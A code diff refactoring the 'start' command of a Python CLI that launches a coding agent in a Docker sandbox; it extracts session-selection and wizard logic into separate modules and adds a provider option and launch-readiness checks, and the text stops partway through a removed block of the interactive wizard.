-from pathlib import Path -from typing import Any, cast +from typing import Any import typer from rich.status import Status -from ... import config, git, sessions, setup, teams -from ...application.launch import ( - ApplyPersonalProfileConfirmation, - ApplyPersonalProfileDependencies, - ApplyPersonalProfileRequest, - ApplyPersonalProfileResult, - BackRequested, - CwdContext, - QuickResumeDismissed, - QuickResumeViewModel, - SelectSessionDependencies, - SelectSessionRequest, - SelectSessionResult, - SessionNameEntered, - SessionSelectionItem, - SessionSelectionMode, - SessionSelectionPrompt, - SessionSelectionWarningOutcome, - StartWizardConfig, - StartWizardContext, - StartWizardState, - StartWizardStep, - TeamOption, - TeamRepoPickerViewModel, - TeamSelected, - TeamSelectionViewModel, - WorkspacePickerViewModel, - WorkspaceSource, - WorkspaceSourceChosen, - WorkspaceSourceViewModel, - WorkspaceSummary, - WorktreeSelected, - apply_personal_profile, - apply_start_wizard_event, - build_clone_repo_prompt, - build_confirm_worktree_prompt, - build_cross_team_resume_prompt, - build_custom_workspace_prompt, - build_quick_resume_prompt, - build_session_name_prompt, - build_team_repo_prompt, - build_team_selection_prompt, - build_workspace_picker_prompt, - build_workspace_source_prompt, - build_worktree_name_prompt, - finalize_launch, - initialize_start_wizard, - prepare_launch_plan, - select_session, -) -from ...application.sessions import SessionService -from ...application.start_session import StartSessionDependencies, StartSessionRequest +from ... import config, sessions, setup +from ...application.launch import finalize_launch +from ...application.start_session import StartSessionRequest from ...bootstrap import get_default_adapters from ...cli_common import console, err_console -from ...contexts import WorkContext, load_recent_contexts, normalize_path, record_context -from ...core.enums import TargetType from ...core.errors import WorkspaceNotFoundError from ...core.exit_codes import EXIT_CANCELLED, EXIT_CONFIG, EXIT_ERROR, EXIT_USAGE -from ...marketplace.materialize import materialize_marketplace -from ...marketplace.resolve import resolve_effective_config -from ...output_mode import json_output_mode, print_human, print_json, set_pretty_mode -from ...panels import create_info_panel, create_warning_panel -from ...ports.git_client import GitClient -from ...ports.personal_profile_service import PersonalProfileService +from ...core.provider_resolution import get_provider_display_name +from ...output_mode import json_output_mode, print_json, set_pretty_mode +from ...panels import create_info_panel +from ...ports.config_models import NormalizedOrgConfig from ...presentation.json.launch_json import build_start_dry_run_envelope -from ...presentation.json.profile_json import build_profile_apply_envelope from ...presentation.launch_presenter import build_sync_output_view_model, render_launch_output -from ...services.workspace import has_project_markers, is_suspicious_directory -from ...theme import Colors, Spinners, get_brand_header -from ...ui.chrome import print_with_layout, render_with_layout -from ...ui.gate import is_interactive_allowed -from ...ui.keys import _BackSentinel -from ...ui.picker import pick_session -from ...ui.prompts import confirm_with_layout -from ...ui.wizard import ( - BACK, - StartWizardAction, - StartWizardAnswer, - StartWizardAnswerKind, - _normalize_path, - render_start_wizard_prompt, +from ...theme import Spinners +from ...ui.chrome import print_with_layout +from ...workspace_local_config import set_workspace_last_used_provider +from .conflict_resolution import LaunchConflictDecision, resolve_launch_conflict +from .dependencies import prepare_live_start_plan +from .flow_interactive import interactive_start, run_start_wizard_flow +from .flow_session import ( + _apply_personal_profile, + _record_session_and_context, + _resolve_session_selection, ) -from .flow_types import ( - UserConfig, - reset_for_team_switch, - set_team_context, - set_workspace, +from .preflight import collect_launch_readiness, ensure_launch_ready, resolve_launch_provider +from .render import ( + build_dry_run_data, + show_auth_bootstrap_panel, + show_dry_run_panel, + show_launch_panel, + warn_if_non_worktree, ) -from .render import build_dry_run_data, show_dry_run_panel, show_launch_panel, warn_if_non_worktree from .team_settings import _configure_team_settings from .workspace import prepare_workspace, resolve_workspace_team, validate_and_resolve_workspace -# ───────────────────────────────────────────────────────────────────────────── -# Helper Functions (extracted for maintainability) -# ───────────────────────────────────────────────────────────────────────────── - - -def _resolve_session_selection( - workspace: str | None, - team: str | None, - resume: bool, - select: bool, - cfg: UserConfig, - *, - json_mode: bool = False, - standalone_override: bool = False, - no_interactive: bool = False, - dry_run: bool = False, - session_service: SessionService, -) -> tuple[str | None, str | None, str | None, str | None, bool, bool]: - """ - Handle session selection logic for --select, --resume, and interactive modes. - - Args: - workspace: Workspace path from command line. - team: Team name from command line. - resume: Whether --resume flag is set. - select: Whether --select flag is set. - cfg: Loaded configuration. - json_mode: Whether --json output is requested (blocks interactive). - standalone_override: Whether --standalone flag is set (overrides config). - - Returns: - Tuple of (workspace, team, session_name, worktree_name, cancelled, was_auto_detected) - If user cancels or no session found, workspace will be None. - cancelled is True only for explicit user cancellation. - was_auto_detected is True if workspace was found via resolver (git/.scc.yaml). - - Raises: - typer.Exit: If interactive mode required but not allowed (non-TTY, CI, --json). - """ - session_name = None - worktree_name = None - cancelled = False - - select_dependencies = SelectSessionDependencies(session_service=session_service) - - # Interactive mode if no workspace provided and no session flags - if workspace is None and not resume and not select: - # For --dry-run without workspace, use resolver to auto-detect (skip interactive) - if dry_run: - from pathlib import Path - - from ...application.workspace import ResolveWorkspaceRequest, resolve_workspace - - context = resolve_workspace(ResolveWorkspaceRequest(cwd=Path.cwd(), workspace_arg=None)) - if context is not None: - return str(context.workspace_root), team, None, None, False, True # auto-detected - # No auto-detect possible, fall through to error - err_console.print( - "[red]Error:[/red] No workspace could be auto-detected.\n" - "[dim]Provide a workspace path: scc start --dry-run /path/to/project[/dim]", - highlight=False, - ) - raise typer.Exit(EXIT_USAGE) - - # Check TTY gating before entering interactive mode - if not is_interactive_allowed( - json_mode=json_mode, - no_interactive_flag=no_interactive, - ): - # Try auto-detect before failing - from pathlib import Path - - from ...application.workspace import ResolveWorkspaceRequest, resolve_workspace - - context = resolve_workspace(ResolveWorkspaceRequest(cwd=Path.cwd(), workspace_arg=None)) - if context is not None: - return str(context.workspace_root), team, None, None, False, True # auto-detected - - err_console.print( - "[red]Error:[/red] Interactive mode requires a terminal (TTY).\n" - "[dim]Provide a workspace path: scc start /path/to/project[/dim]", - highlight=False, - ) - raise typer.Exit(EXIT_USAGE) - adapters = get_default_adapters() - workspace_result, team, session_name, worktree_name = cast( - tuple[str | None, str | None, str | None, str | None], - interactive_start( - cfg, - standalone_override=standalone_override, - team_override=team, - git_client=adapters.git_client, - ), - ) - if workspace_result is None: - return None, team, None, None, True, False - return ( - workspace_result, - team, - session_name, - worktree_name, - False, - False, - ) - - # Handle --select: interactive session picker - if select and workspace is None: - # Check TTY gating before showing session picker - if not is_interactive_allowed( - json_mode=json_mode, - no_interactive_flag=no_interactive, - ): - console.print( - "[red]Error:[/red] --select requires a terminal (TTY).\n" - "[dim]Use --resume to auto-select most recent session.[/dim]", - highlight=False, - ) - raise typer.Exit(EXIT_USAGE) - - # Prefer explicit --team, then selected_profile for filtering - effective_team = team or cfg.get("selected_profile") - if standalone_override: - effective_team = None - - # If org mode and no active team, require explicit selection - if effective_team is None and not standalone_override: - if not json_mode: - console.print( - "[yellow]No active team selected.[/yellow] " - "Run 'scc team switch' or pass --team to select." - ) - return None, team, None, None, False, False +# Re-export public names for backward compatibility +__all__ = [ + "start", + "interactive_start", + "run_start_wizard_flow", + "_resolve_session_selection", + "_apply_personal_profile", + "_record_session_and_context", +] - outcome = select_session( - SelectSessionRequest( - mode=SessionSelectionMode.SELECT, - team=effective_team, - include_all=False, - limit=10, - ), - dependencies=select_dependencies, - ) - - if isinstance(outcome, SessionSelectionWarningOutcome): - if not json_mode: - console.print("[yellow]No recent sessions found.[/yellow]") - return None, team, None, None, False, False - - if isinstance(outcome, SessionSelectionPrompt): - selected_item = _prompt_for_session_selection(outcome) - if selected_item is None: - return None, team, None, None, True, False - outcome = select_session( - SelectSessionRequest( - mode=SessionSelectionMode.SELECT, - team=effective_team, - include_all=False, - limit=10, - selection=selected_item, - ), - dependencies=select_dependencies, - ) - - if isinstance(outcome, SelectSessionResult): - selected = outcome.session - workspace = selected.workspace - if not team: - team = selected.team - # --standalone overrides any team from session (standalone means no team) - if standalone_override: - team = None - if not json_mode: - print_with_layout(console, f"[dim]Selected: {workspace}[/dim]") - - # Handle --resume: auto-select most recent session - elif resume and workspace is None: - # Prefer explicit --team, then selected_profile for resume filtering - effective_team = team or cfg.get("selected_profile") - if standalone_override: - effective_team = None - - # If org mode and no active team, require explicit selection - if effective_team is None and not standalone_override: - if not json_mode: - console.print( - "[yellow]No active team selected.[/yellow] " - "Run 'scc team switch' or pass --team to resume." - ) - return None, team, None, None, False, False - - outcome = select_session( - SelectSessionRequest( - mode=SessionSelectionMode.RESUME, - team=effective_team, - include_all=False, - limit=50, - ), - dependencies=select_dependencies, - ) - - if isinstance(outcome, SessionSelectionWarningOutcome): - if not json_mode: - console.print("[yellow]No recent sessions found.[/yellow]") - return None, team, None, None, False, False - if isinstance(outcome, SelectSessionResult): - recent_session = outcome.session - workspace = recent_session.workspace - if not team: - team = recent_session.team - # --standalone overrides any team from session (standalone means no team) - if standalone_override: - team = None - if not json_mode: - print_with_layout(console, f"[dim]Resuming: {workspace}[/dim]") - - return workspace, team, session_name, worktree_name, cancelled, False # explicit workspace +# ───────────────────────────────────────────────────────────────────────────── +# Dry-run helper (extracted to keep start() under 300 lines) +# ───────────────────────────────────────────────────────────────────────────── -def _apply_personal_profile( - workspace_path: Path, +def _apply_profile_and_show_stack( *, + workspace_path: Any, org_config: dict[str, Any] | None, + team: str | None, json_mode: bool, non_interactive: bool, - profile_service: PersonalProfileService, -) -> tuple[str | None, bool]: - """Apply personal profile if available. - - Returns (profile_id, applied). - """ - request = _build_personal_profile_request( + profile_service: Any, +) -> None: + """Apply personal profile overlay and print the active stack summary.""" + personal_profile_id, personal_applied = _apply_personal_profile( workspace_path, + org_config=org_config, json_mode=json_mode, non_interactive=non_interactive, - confirm_apply=None, - org_config=org_config, + profile_service=profile_service, ) - dependencies = ApplyPersonalProfileDependencies(profile_service=profile_service) - while True: - outcome = apply_personal_profile(request, dependencies=dependencies) - if isinstance(outcome, ApplyPersonalProfileConfirmation): - _render_personal_profile_confirmation(outcome, json_mode=json_mode) - confirm = confirm_with_layout( - console, - outcome.request.prompt, - default=outcome.default_response, - ) - request = _build_personal_profile_request( - workspace_path, - json_mode=json_mode, - non_interactive=non_interactive, - confirm_apply=confirm, - org_config=org_config, - ) - continue - - if isinstance(outcome, ApplyPersonalProfileResult): - _render_personal_profile_result(outcome, json_mode=json_mode) - return outcome.profile_id, outcome.applied - - return None, False + if not json_mode: + personal_label = "project" if personal_profile_id else "none" + if personal_profile_id and not personal_applied: + personal_label = "skipped" + workspace_label = ( + "overrides" if profile_service.workspace_has_overrides(workspace_path) else "none" + ) + print_with_layout( + console, + "[dim]Active stack:[/dim] " + f"Team: {team or 'standalone'} | " + f"Personal: {personal_label} | " + f"Workspace: {workspace_label}", + ) -def _build_personal_profile_request( - workspace_path: Path, +def _handle_dry_run( *, - json_mode: bool, - non_interactive: bool, - confirm_apply: bool | None, - org_config: dict[str, Any] | None, -) -> ApplyPersonalProfileRequest: - return ApplyPersonalProfileRequest( + start_plan: Any, + workspace_path: Any, + team: str | None, + resolved_provider: str, + json_output: bool, + pretty: bool, +) -> None: + """Render dry-run output and exit. Never returns normally.""" + result = start_plan.resolver_result + org_config_for_dry_run = config.load_cached_org_config() + dry_run_data = build_dry_run_data( workspace_path=workspace_path, - interactive_allowed=is_interactive_allowed( - json_mode=json_mode, - no_interactive_flag=non_interactive, - ), - confirm_apply=confirm_apply, - org_config=org_config, + team=team, + org_config=org_config_for_dry_run, + project_config=None, + entry_dir=result.entry_dir, + mount_root=result.mount_root, + container_workdir=result.container_workdir, + resolution_reason=result.reason, + provider_id=resolved_provider, ) + if pretty: + json_output = True -def _render_personal_profile_confirmation( - outcome: ApplyPersonalProfileConfirmation, *, json_mode: bool -) -> None: - if json_mode: - return - if outcome.message: - console.print(outcome.message) - - -def _render_personal_profile_result( - outcome: ApplyPersonalProfileResult, *, json_mode: bool -) -> None: - if json_mode: - envelope = build_profile_apply_envelope(outcome) - print_json(envelope) - return - if outcome.skipped_items: - for skipped in outcome.skipped_items: - label = "plugin" if skipped.target_type == TargetType.PLUGIN else "MCP server" - console.print(f"[yellow]Skipped {label} '{skipped.item}': {skipped.reason}[/yellow]") - if outcome.message: - console.print(outcome.message) - - -def _prompt_for_session_selection(prompt: SessionSelectionPrompt) -> SessionSelectionItem | None: - items = [option.value for option in prompt.request.options if option.value is not None] - if not items: - return None - summaries = [item.summary for item in items] - selected = pick_session( - summaries, - title=prompt.request.title, - subtitle=prompt.request.subtitle, - ) - if selected is None: - return None - try: - index = summaries.index(selected) - except ValueError: - return None - return items[index] - + if json_output: + with json_output_mode(): + if pretty: + set_pretty_mode(True) + try: + envelope = build_start_dry_run_envelope(dry_run_data) + print_json(envelope) + finally: + if pretty: + set_pretty_mode(False) + else: + show_dry_run_panel(dry_run_data) -def _record_session_and_context( - workspace_path: Path, - team: str | None, - session_name: str | None, - current_branch: str | None, -) -> None: - """Record session metadata and quick-resume context.""" - sessions.record_session( - workspace=str(workspace_path), - team=team, - session_name=session_name, - container_name=None, - branch=current_branch, - ) - repo_root = git.get_worktree_main_repo(workspace_path) or workspace_path - worktree_name = workspace_path.name - context = WorkContext( - team=team, - repo_root=repo_root, - worktree_path=workspace_path, - worktree_name=worktree_name, - branch=current_branch, - last_session_id=session_name, - ) - try: - record_context(context) - except (OSError, ValueError) as exc: - print_human( - "[yellow]Warning:[/yellow] Could not save Quick Resume context.", - highlight=False, - ) - print_human(f"[dim]{exc}[/dim]", highlight=False) - logging.debug(f"Failed to record context for Quick Resume: {exc}") - if team: - try: - config.set_workspace_team(str(workspace_path), team) - except (OSError, ValueError) as exc: - print_human( - "[yellow]Warning:[/yellow] Could not save workspace team preference.", - highlight=False, - ) - print_human(f"[dim]{exc}[/dim]", highlight=False) - logging.debug(f"Failed to store workspace team mapping: {exc}") + raise typer.Exit(0) # ───────────────────────────────────────────────────────────────────────────── @@ -514,27 +177,25 @@ def start( "--allow-suspicious-workspace", help="Allow starting in suspicious directories (e.g., home, /tmp) in non-interactive mode", ), + provider: str | None = typer.Option( + None, + "--provider", + help="Agent provider override (claude or codex)", + ), ) -> None: - """ - Start Claude Code in a Docker sandbox. + """Start agent in a Docker sandbox. If no arguments provided, launches interactive mode. """ - from pathlib import Path + from pathlib import Path # noqa: F811 # Capture original CWD for entry_dir tracking (before any directory changes) original_cwd = Path.cwd() if isinstance(debug, bool) and debug: err_console.print( - "[red]Error:[/red] --debug is a global flag and must be placed before the command.", - highlight=False, - ) - err_console.print( - "[dim]Use: scc --debug start [/dim]", - highlight=False, - ) - err_console.print( + "[red]Error:[/red] --debug is a global flag and must be placed before the command.\n" + "[dim]Use: scc --debug start [/dim]\n" "[dim]With uv: uv run scc --debug start [/dim]", highlight=False, ) @@ -550,7 +211,6 @@ def start( # ── Step 0: Handle --standalone mode (skip org config entirely) ─────────── if standalone: - # In standalone mode, never ask for team and never load org config team = None if not json_output and not pretty: console.print("[dim]Running in standalone mode (no organization config)[/dim]") @@ -559,7 +219,6 @@ def start( # ── Step 0.5: Handle --offline mode (cache-only, fail fast) ─────────────── if offline and not standalone: - # Check if cached org config exists org_config = config.load_cached_org_config() if org_config is None: err_console.print( @@ -572,8 +231,6 @@ def start( console.print("[dim]Using cached organization config (offline mode)[/dim]") # ── Step 1: First-run detection ────────────────────────────────────────── - # Skip setup wizard in standalone mode (no org config needed) - # Skip in offline mode (can't fetch remote - already validated cache exists) if not standalone and not offline and setup.is_setup_needed(): if not setup.maybe_run_setup(console): raise typer.Exit(1) @@ -583,7 +240,7 @@ def start( session_service = sessions.get_session_service(adapters.filesystem) # ── Step 2: Session selection (interactive, --select, --resume) ────────── - workspace, team, session_name, worktree_name, cancelled, was_auto_detected = ( + workspace, team, session_name, worktree_name, cancelled, was_auto_detected, session_provider = ( _resolve_session_selection( workspace=workspace, team=team, @@ -607,7 +264,6 @@ def start( raise typer.Exit(EXIT_CANCELLED) # ── Step 3: Docker availability check ──────────────────────────────────── - # Skip Docker check for dry-run (just previewing config) if not dry_run: with Status("[cyan]Checking Docker...[/cyan]", console=console, spinner=Spinners.DOCKER): adapters.sandbox_runtime.ensure_available() @@ -627,7 +283,6 @@ def start( raise WorkspaceNotFoundError(path=str(workspace_path)) # ── Step 5: Workspace preparation (worktree, deps, git safety) ─────────── - # Skip for dry-run (no worktree creation, no deps, no branch safety prompts) if not dry_run: workspace_path = prepare_workspace(workspace_path, worktree_name, install_deps) assert workspace_path is not None @@ -643,8 +298,6 @@ def start( ) # ── Step 6: Team configuration ─────────────────────────────────────────── - # Skip team config in standalone mode (no org config to apply) - # In offline mode, team config still applies from cached org config if not dry_run and not standalone: _configure_team_settings(team, cfg) @@ -654,17 +307,42 @@ def start( if worktree_name: was_auto_detected = False - start_dependencies = StartSessionDependencies( - filesystem=adapters.filesystem, - remote_fetcher=adapters.remote_fetcher, - clock=adapters.clock, - git_client=adapters.git_client, - agent_runner=adapters.agent_runner, - sandbox_runtime=adapters.sandbox_runtime, - resolve_effective_config=resolve_effective_config, - materialize_marketplace=materialize_marketplace, - ) workspace_arg = None if was_auto_detected else str(workspace_path) + + # ── Step 6.1: Resolve active provider ──────────────────────────────────── + normalized_org = NormalizedOrgConfig.from_dict(org_config) if org_config is not None else None + # Normalize typer default: direct calls pass OptionInfo, not None. + cli_provider = provider if isinstance(provider, str) else None + resolved_provider, _resolution_source = resolve_launch_provider( + cli_flag=cli_provider, + resume_provider=session_provider, + workspace_path=workspace_path, + config_provider=config.get_selected_provider(), + normalized_org=normalized_org, + team=team, + adapters=adapters, + non_interactive=non_interactive, + ) + if resolved_provider is None: + if not (json_output or pretty): + console.print("[dim]Cancelled.[/dim]") + raise typer.Exit(EXIT_CANCELLED) + + # ── Step 6.2: Preflight readiness (image + auth) ───────────────────────── + # For non-resume fresh starts, check readiness before plan construction. + # Dry-run skips this entirely (no image/auth needed for preview). + # Resume paths skip auth bootstrap since the original session authenticated. + if not dry_run and not resume: + readiness = collect_launch_readiness(resolved_provider, _resolution_source, adapters) + if not readiness.launch_ready: + ensure_launch_ready( + readiness, + adapters=adapters, + console=console, + non_interactive=non_interactive, + show_notice=show_auth_bootstrap_panel, + ) + start_request = StartSessionRequest( workspace_path=workspace_path, workspace_arg=workspace_arg, @@ -677,60 +355,32 @@ def start( standalone=standalone, dry_run=dry_run, allow_suspicious=allow_suspicious_workspace, - org_config=org_config, + org_config=normalized_org, + raw_org_config=org_config, + provider_id=resolved_provider, ) - should_sync = ( - not dry_run - and not offline - and not standalone - and team is not None - and org_config is not None + start_dependencies, start_plan = prepare_live_start_plan( + start_request, + adapters=adapters, + console=console, + provider_id=resolved_provider, ) - if should_sync: - with Status( - "[cyan]Syncing marketplace settings...[/cyan]", - console=console, - spinner=Spinners.NETWORK, - ): - start_plan = prepare_launch_plan(start_request, dependencies=start_dependencies) - else: - start_plan = prepare_launch_plan(start_request, dependencies=start_dependencies) output_view_model = build_sync_output_view_model(start_plan) render_launch_output(output_view_model, console=console, json_mode=(json_output or pretty)) - # ── Step 6.55: Apply personal profile (local overlay) ───────────────────── - personal_profile_id = None - personal_applied = False + # ── Step 6.55–6.6: Personal profile + active stack summary ────────────── if not dry_run and workspace_path is not None: - personal_profile_id, personal_applied = _apply_personal_profile( - workspace_path, + _apply_profile_and_show_stack( + workspace_path=workspace_path, org_config=org_config, + team=team, json_mode=(json_output or pretty), non_interactive=non_interactive, profile_service=adapters.personal_profile_service, ) - # ── Step 6.6: Active stack summary ─────────────────────────────────────── - if not (json_output or pretty) and workspace_path is not None: - personal_label = "project" if personal_profile_id else "none" - if personal_profile_id and not personal_applied: - personal_label = "skipped" - workspace_label = ( - "overrides" - if adapters.personal_profile_service.workspace_has_overrides(workspace_path) - else "none" - ) - print_with_layout( - console, - "[dim]Active stack:[/dim] " - f"Team: {team or 'standalone'} | " - f"Personal: {personal_label} | " - f"Workspace: {workspace_label}", - ) - # ── Step 6.7: Resolve mount path for worktrees (needed for dry-run too) ──── - # At this point workspace_path is guaranteed to exist (validated above) assert workspace_path is not None resolver_result = start_plan.resolver_result if resolver_result.is_mount_expanded and not (json_output or pretty): @@ -749,39 +399,32 @@ def start( # ── Step 6.8: Handle --dry-run (preview without launching) ──────────────── if dry_run: - result = start_plan.resolver_result - org_config_for_dry_run = config.load_cached_org_config() - dry_run_data = build_dry_run_data( + _handle_dry_run( + start_plan=start_plan, workspace_path=workspace_path, team=team, - org_config=org_config_for_dry_run, - project_config=None, - entry_dir=result.entry_dir, - mount_root=result.mount_root, - container_workdir=result.container_workdir, - resolution_reason=result.reason, + resolved_provider=resolved_provider, + json_output=json_output, + pretty=pretty, ) - # Handle --pretty implies --json - if pretty: - json_output = True - - if json_output: - with json_output_mode(): - if pretty: - set_pretty_mode(True) - try: - envelope = build_start_dry_run_envelope(dry_run_data) - print_json(envelope) - finally: - if pretty: - set_pretty_mode(False) - else: - show_dry_run_panel(dry_run_data) + warn_if_non_worktree(workspace_path, json_mode=(json_output or pretty)) + conflict_resolution = resolve_launch_conflict( + start_plan, + dependencies=start_dependencies, + console=console, + display_name=get_provider_display_name(resolved_provider), + json_mode=(json_output or pretty), + non_interactive=non_interactive, + ) + if conflict_resolution.decision is LaunchConflictDecision.KEEP_EXISTING: + set_workspace_last_used_provider(workspace_path, resolved_provider) raise typer.Exit(0) - - warn_if_non_worktree(workspace_path, json_mode=(json_output or pretty)) + if conflict_resolution.decision is LaunchConflictDecision.CANCELLED: + console.print("[dim]Cancelled.[/dim]") + raise typer.Exit(EXIT_CANCELLED) + start_plan = conflict_resolution.plan # ── Step 8: Launch sandbox ─────────────────────────────────────────────── _record_session_and_context( @@ -789,6 +432,7 @@ def start( team, session_name, current_branch, + provider_id=resolved_provider, ) show_launch_panel( workspace=workspace_path, @@ -796,868 +440,7 @@ def start( session_name=session_name, branch=current_branch, is_resume=False, + display_name=get_provider_display_name(resolved_provider), ) finalize_launch(start_plan, dependencies=start_dependencies) - - -# ───────────────────────────────────────────────────────────────────────────── -# Interactive Flow -# ───────────────────────────────────────────────────────────────────────────── - - -def interactive_start( - cfg: UserConfig, - *, - skip_quick_resume: bool = False, - allow_back: bool = False, - standalone_override: bool = False, - team_override: str | None = None, - git_client: GitClient | None = None, -) -> tuple[str | _BackSentinel | None, str | None, str | None, str | None]: - """Guide user through interactive session setup. - - Prompt for team selection, workspace source, optional worktree creation, - and session naming. - - The flow prioritizes quick resume by showing recent contexts first: - 0. Global Quick Resume - if contexts exist and skip_quick_resume=False - (filtered by effective_team: --team > selected_profile) - 1. Team selection - if no context selected (skipped in standalone mode) - 2. Workspace source selection - 2.5. Workspace-scoped Quick Resume - if contexts exist for selected workspace - 3. Worktree creation (optional) - 4. Session naming (optional) - - Navigation Semantics: - - 'q' anywhere: Quit wizard entirely (returns None) - - Esc at Step 0: BACK to dashboard (if allow_back) or skip to Step 1 - - Esc at Step 2: Go back to Step 1 (if team exists) or BACK to dashboard - - Esc at Step 2.5: Go back to Step 2 workspace picker - - 't' anywhere: Restart at Step 1 (team selection) - - 'a' at Quick Resume: Toggle between filtered and all-teams view - - Args: - cfg: Application configuration dictionary containing workspace_base - and other settings. - skip_quick_resume: If True, bypass the Quick Resume picker and go - directly to project source selection. Used when starting from - dashboard empty states (no_containers, no_sessions) where resume - doesn't make sense. - allow_back: If True, Esc at top level returns BACK sentinel instead - of None. Used when called from Dashboard to enable return to - dashboard on Esc. - standalone_override: If True, force standalone mode regardless of - config. Used when --standalone CLI flag is passed. - team_override: If provided, use this team for filtering instead of - selected_profile. Set by --team CLI flag. - git_client: Optional git client for branch detection in Quick Resume. - - Returns: - Tuple of (workspace, team, session_name, worktree_name). - - Success: (path, team, session, worktree) with path always set - - Cancel: (None, None, None, None) if user pressed q - - Back: (BACK, None, None, None) if allow_back and user pressed Esc - """ - header = get_brand_header() - header_renderable = render_with_layout(console, header) - console.print(header_renderable, style=Colors.BRAND) - - # Determine mode: standalone vs organization - # CLI --standalone flag overrides config setting - standalone_mode = standalone_override or config.is_standalone_mode() - - # Calculate effective_team: --team flag takes precedence over selected_profile - # This is the team used for filtering Quick Resume contexts - selected_profile = cfg.get("selected_profile") - effective_team: str | None = team_override or selected_profile - - # Build display label for UI - if standalone_mode: - active_team_label = "standalone" - elif team_override: - # Show that --team flag is active with "(filtered)" indicator - active_team_label = f"{team_override} (filtered)" - elif selected_profile: - active_team_label = selected_profile - else: - active_team_label = "none (press 't' to choose)" - active_team_context = f"Team: {active_team_label}" - - # Get available teams (from org config if available) - org_config = config.load_cached_org_config() - available_teams = teams.list_teams(org_config) - - if git_client is None: - adapters = get_default_adapters() - git_client = adapters.git_client - - try: - current_branch = git_client.get_current_branch(Path.cwd()) - except Exception: - current_branch = None - - has_active_team = team_override is not None or selected_profile is not None - wizard_config = StartWizardConfig( - quick_resume_enabled=not skip_quick_resume, - team_selection_required=not standalone_mode and not has_active_team, - allow_back=allow_back, - ) - state = initialize_start_wizard(wizard_config) - if team_override: - state = StartWizardState( - step=state.step, - context=StartWizardContext(team=team_override), - config=state.config, - ) - - user_dismissed_quick_resume = False - show_all_teams = False - workspace_base = cfg.get("workspace_base", "~/projects") - - def _prompt_workspace_quick_resume( - workspace: str, *, team: str | None - ) -> StartWizardAnswer | None: - if user_dismissed_quick_resume: - return None - - normalized_workspace = normalize_path(workspace) - workspace_contexts: list[WorkContext] = [] - team_filter = None if standalone_mode else team if team else "all" - for ctx in load_recent_contexts(limit=30, team_filter=team_filter): - if standalone_mode and ctx.team is not None: - continue - if ctx.worktree_path == normalized_workspace: - workspace_contexts.append(ctx) - continue - if ctx.repo_root == normalized_workspace: - workspace_contexts.append(ctx) - continue - try: - if normalized_workspace.is_relative_to(ctx.worktree_path): - workspace_contexts.append(ctx) - continue - if normalized_workspace.is_relative_to(ctx.repo_root): - workspace_contexts.append(ctx) - except ValueError: - pass - - if not workspace_contexts: - return None - - console.print() - workspace_show_all_teams = False - while True: - displayed_contexts = workspace_contexts - if workspace_show_all_teams: - displayed_contexts = [] - for ctx in load_recent_contexts(limit=30, team_filter="all"): - if ctx.worktree_path == normalized_workspace: - displayed_contexts.append(ctx) - continue - if ctx.repo_root == normalized_workspace: - displayed_contexts.append(ctx) - continue - try: - if normalized_workspace.is_relative_to(ctx.worktree_path): - displayed_contexts.append(ctx) - continue - if normalized_workspace.is_relative_to(ctx.repo_root): - displayed_contexts.append(ctx) - except ValueError: - pass - - qr_subtitle = "Existing sessions found for this workspace" - if workspace_show_all_teams: - qr_subtitle = "All teams for this workspace — resuming uses that team's plugins" - - quick_resume_view = QuickResumeViewModel( - title=f"Resume session in {Path(workspace).name}?", - subtitle=qr_subtitle, - context_label="All teams" - if workspace_show_all_teams - else f"Team: {team or active_team_label}", - standalone=standalone_mode, - effective_team=team or effective_team, - contexts=displayed_contexts, - current_branch=current_branch, - ) - prompt = build_quick_resume_prompt(view_model=quick_resume_view) - answer = render_start_wizard_prompt( - prompt, - console=console, - allow_back=True, - standalone=standalone_mode, - context_label=quick_resume_view.context_label, - current_branch=current_branch, - effective_team=team or effective_team, - ) - - if answer.kind is StartWizardAnswerKind.CANCELLED: - return answer - if answer.kind is StartWizardAnswerKind.BACK: - return answer - if answer.value is StartWizardAction.SWITCH_TEAM: - # Signal to caller that team switch was requested - return answer - - if answer.value is StartWizardAction.NEW_SESSION: - console.print() - return answer - - if answer.value is StartWizardAction.TOGGLE_ALL_TEAMS: - if standalone_mode: - console.print("[dim]All teams view is unavailable in standalone mode[/dim]") - console.print() - continue - workspace_show_all_teams = not workspace_show_all_teams - continue - - selected_context = cast(WorkContext, answer.value) - current_team = team or effective_team - if current_team and selected_context.team and selected_context.team != current_team: - console.print() - prompt = build_cross_team_resume_prompt(selected_context.team) - confirm_answer = render_start_wizard_prompt(prompt, console=console) - if not bool(confirm_answer.value): - continue - return answer - - def _resolve_workspace_resume( - state: StartWizardState, - workspace: str, - *, - workspace_source: WorkspaceSource, - ) -> ( - StartWizardState - | tuple[str | _BackSentinel | None, str | None, str | None, str | None] - | None - ): - nonlocal show_all_teams - - resume_answer = _prompt_workspace_quick_resume(workspace, team=state.context.team) - - if resume_answer is None: - return set_workspace( - state, - workspace, - workspace_source, - standalone_mode=standalone_mode, - team_override=team_override, - effective_team=effective_team, - ) - - if resume_answer.kind is StartWizardAnswerKind.CANCELLED: - return (None, None, None, None) - if resume_answer.kind is StartWizardAnswerKind.BACK: - return None - - if resume_answer.value is StartWizardAction.SWITCH_TEAM: - show_all_teams = False - reset_state = reset_for_team_switch(state) - return set_team_context(reset_state, team_override) - - if resume_answer.value is StartWizardAction.NEW_SESSION: - return set_workspace( - state, - workspace, - workspace_source, - standalone_mode=standalone_mode, - team_override=team_override, - effective_team=effective_team, - ) - - selected_context = cast(WorkContext, resume_answer.value) - return ( - str(selected_context.worktree_path), - selected_context.team, - selected_context.last_session_id, - None, - ) - - while state.step not in { - StartWizardStep.COMPLETE, - StartWizardStep.CANCELLED, - StartWizardStep.BACK, - }: - if state.step is StartWizardStep.QUICK_RESUME: - if not standalone_mode and not effective_team and available_teams: - console.print("[dim]Tip: Select a team first to see team-specific sessions[/dim]") - console.print() - state = apply_start_wizard_event(state, QuickResumeDismissed()) - continue - - team_filter = "all" if show_all_teams else effective_team - recent_contexts = load_recent_contexts(limit=10, team_filter=team_filter) - qr_subtitle: str | None = None - if show_all_teams: - qr_context_label = "All teams" - qr_title = "Quick Resume — All Teams" - if recent_contexts: - qr_subtitle = ( - "Showing all teams — resuming uses that team's plugins. " - "Press 'a' to filter." - ) - else: - qr_subtitle = "No sessions yet — start fresh" - else: - qr_context_label = active_team_context - qr_title = "Quick Resume" - if not recent_contexts: - all_contexts = load_recent_contexts(limit=10, team_filter="all") - team_label = effective_team or "standalone" - if all_contexts: - qr_subtitle = ( - f"No sessions yet for {team_label}. Press 'a' to show all teams." - ) - else: - qr_subtitle = "No sessions yet — start fresh" - - quick_resume_view = QuickResumeViewModel( - title=qr_title, - 